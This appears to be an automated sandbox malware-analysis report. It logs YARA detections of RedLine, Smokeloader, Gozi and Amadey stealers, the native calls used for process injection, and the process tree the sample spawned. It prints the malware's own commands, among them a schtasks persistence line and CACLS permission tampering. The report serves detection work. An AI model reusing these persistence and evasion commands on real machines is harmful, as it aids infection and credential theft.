Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041A4BE 12_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00407D62 12_2_00407D62
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00418244 12_2_00418244
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00401650 12_2_00401650
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00402F20 12_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004193C4 12_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00418788 12_2_00418788
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00402F89 12_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00402B90 12_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004073A0 12_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_02526078 12_2_02526078
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_02526088 12_2_02526088
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Uses 32bit PE files
Source: S2XJ2wbz7u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: String function: 0040E1D8 appears 44 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401386
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040145D
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401469
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040148C
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401386
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040145D
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401469
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040148C
PE file contains executable resources (Code or Archives)
Source: 86EE.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8C00.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2B4A.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 453D.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: S2XJ2wbz7u.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tiddsjj Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@67/30@58/22
Source: C:\Users\user\AppData\Local\Temp\3790.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\S2XJ2wbz7u.exe C:\Users\user\Desktop\S2XJ2wbz7u.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\tiddsjj C:\Users\user\AppData\Roaming\tiddsjj
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
